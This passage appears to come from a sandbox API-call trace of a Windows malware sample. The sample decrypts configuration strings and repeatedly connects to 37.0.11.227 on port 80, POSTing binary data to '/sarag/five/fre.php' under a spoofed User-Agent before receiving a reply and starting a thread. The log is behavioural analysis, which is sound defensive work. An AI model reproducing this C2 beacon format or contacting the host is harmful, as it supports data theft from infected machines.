CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0331.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.635] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0331.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.636] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0331.636] GetProcessHeap () returned 0x690000 [0331.636] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0331.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.637] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0331.638] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.638] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0331.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.641] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0331.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.642] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0331.642] GetProcessHeap () returned 0x690000 [0331.642] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0331.643] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0331.643] GetProcessHeap () returned 0x690000 [0331.643] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0331.644] GetProcessHeap () returned 0x690000 [0331.644] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0331.644] GetProcessHeap () returned 0x690000 [0331.645] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0331.645] GetProcessHeap () returned 0x690000 [0331.645] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0331.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.646] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0331.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.654] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0331.660] GetProcessHeap () returned 0x690000 [0331.660] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0331.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.661] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0331.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.661] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0331.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.665] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0331.665] GetProcessHeap () returned 0x690000 [0331.665] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0331.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.666] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0331.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.667] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0331.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.690] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0331.700] GetProcessHeap () returned 0x690000 [0331.700] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0331.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.701] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0331.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.702] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0331.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.703] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0331.704] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.704] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0331.704] GetProcessHeap () returned 0x690000 [0331.704] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0331.708] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0331.708] GetProcessHeap () returned 0x690000 [0331.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0331.708] socket (af=2, type=1, protocol=6) returned 0xbac [0331.716] connect (s=0xbac, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0331.744] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0331.744] GetProcessHeap () returned 0x690000 [0331.744] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0331.744] GetProcessHeap () returned 0x690000 [0331.744] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0331.745] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0331.745] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0331.746] GetProcessHeap () returned 0x690000 [0331.746] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0331.746] GetProcessHeap () returned 0x690000 [0331.746] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0331.747] GetProcessHeap () returned 0x690000 [0331.747] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0331.747] GetProcessHeap () returned 0x690000 [0331.747] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0331.747] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0331.748] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0331.748] GetProcessHeap () returned 0x690000 [0331.748] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0331.748] GetProcessHeap () returned 0x690000 [0331.749] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0331.749] send (s=0xbac, buf=0x6ad508*, len=242, flags=0) returned 242 [0331.750] send (s=0xbac, buf=0x6aba40*, len=159, flags=0) returned 159 [0331.750] GetProcessHeap () returned 0x690000 [0331.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0331.750] recv (in: s=0xbac, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0331.830] GetProcessHeap () returned 0x690000 [0331.831] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0331.831] GetProcessHeap () returned 0x690000 [0331.831] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0331.832] GetProcessHeap () returned 0x690000 [0331.832] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0331.832] GetProcessHeap () returned 0x690000 [0331.832] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0331.833] closesocket (s=0xbac) returned 0 [0331.833] GetProcessHeap () returned 0x690000 [0331.833] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0331.833] GetProcessHeap () returned 0x690000 [0331.834] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0331.834] GetProcessHeap () returned 0x690000 [0331.835] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0331.835] GetProcessHeap () returned 0x690000 [0331.835] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0331.846] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18f8) returned 0xbac [0331.849] Sleep (dwMilliseconds=0xea60) [0331.851] GetProcessHeap () returned 0x690000 [0331.851] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0331.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.852] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0331.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.860] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0331.866] GetProcessHeap () returned 0x690000 [0331.866] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0331.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.867] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0331.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.868] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0331.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.872] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0331.872] GetProcessHeap () returned 0x690000 [0331.872] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0331.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.873] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0331.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.874] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0331.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.875] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0331.875] GetProcessHeap () returned 0x690000 [0331.875] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0331.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.876] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0331.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.877] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0331.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.878] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0331.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.879] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0331.879] GetProcessHeap () returned 0x690000 [0331.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0331.881] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0331.881] GetProcessHeap () returned 0x690000 [0331.881] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0331.881] GetProcessHeap () returned 0x690000 [0331.882] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0331.882] GetProcessHeap () returned 0x690000 [0331.882] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0331.882] GetProcessHeap () returned 0x690000 [0331.882] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0331.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.883] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0331.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.888] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0331.896] GetProcessHeap () returned 0x690000 [0331.896] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0331.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.897] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0331.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.898] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0331.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.899] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0331.899] GetProcessHeap () returned 0x690000 [0331.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0331.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.903] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0331.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.904] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0331.904] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.904] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0331.905] GetProcessHeap () returned 0x690000 [0331.905] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0331.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.905] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0331.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.906] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0331.907] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.907] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0331.910] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.910] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0331.910] GetProcessHeap () returned 0x690000 [0331.910] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0331.910] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0331.910] GetProcessHeap () returned 0x690000 [0331.910] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0331.910] socket (af=2, type=1, protocol=6) returned 0xbb0 [0331.911] connect (s=0xbb0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0331.939] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0331.939] GetProcessHeap () returned 0x690000 [0331.940] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0331.940] GetProcessHeap () returned 0x690000 [0331.940] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0331.940] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0331.941] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0331.941] GetProcessHeap () returned 0x690000 [0331.941] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0331.941] GetProcessHeap () returned 0x690000 [0331.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0331.941] GetProcessHeap () returned 0x690000 [0331.941] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0331.941] GetProcessHeap () returned 0x690000 [0331.941] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0331.942] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0331.943] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0331.943] GetProcessHeap () returned 0x690000 [0331.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0331.943] GetProcessHeap () returned 0x690000 [0331.943] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0331.943] send (s=0xbb0, buf=0x6ad508*, len=242, flags=0) returned 242 [0331.972] send (s=0xbb0, buf=0x6aba40*, len=159, flags=0) returned 159 [0331.972] GetProcessHeap () returned 0x690000 [0331.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0331.972] recv (in: s=0xbb0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0332.016] GetProcessHeap () returned 0x690000 [0332.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0332.017] GetProcessHeap () returned 0x690000 [0332.018] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0332.019] GetProcessHeap () returned 0x690000 [0332.019] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0332.019] GetProcessHeap () returned 0x690000 [0332.020] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0332.020] closesocket (s=0xbb0) returned 0 [0332.020] GetProcessHeap () returned 0x690000 [0332.020] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0332.020] GetProcessHeap () returned 0x690000 [0332.021] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0332.021] GetProcessHeap () returned 0x690000 [0332.021] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0332.021] GetProcessHeap () returned 0x690000 [0332.021] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0332.022] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18fc) returned 0xbb0 [0332.024] Sleep (dwMilliseconds=0xea60) [0332.027] GetProcessHeap () returned 0x690000 [0332.027] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0332.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.030] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0332.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.038] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0332.045] GetProcessHeap () returned 0x690000 [0332.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0332.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.047] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0332.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.048] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0332.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.049] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0332.049] GetProcessHeap () returned 0x690000 [0332.050] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0332.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.052] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0332.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.053] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0332.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.054] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0332.054] GetProcessHeap () returned 0x690000 [0332.054] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0332.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.055] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0332.055] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.056] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0332.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.057] 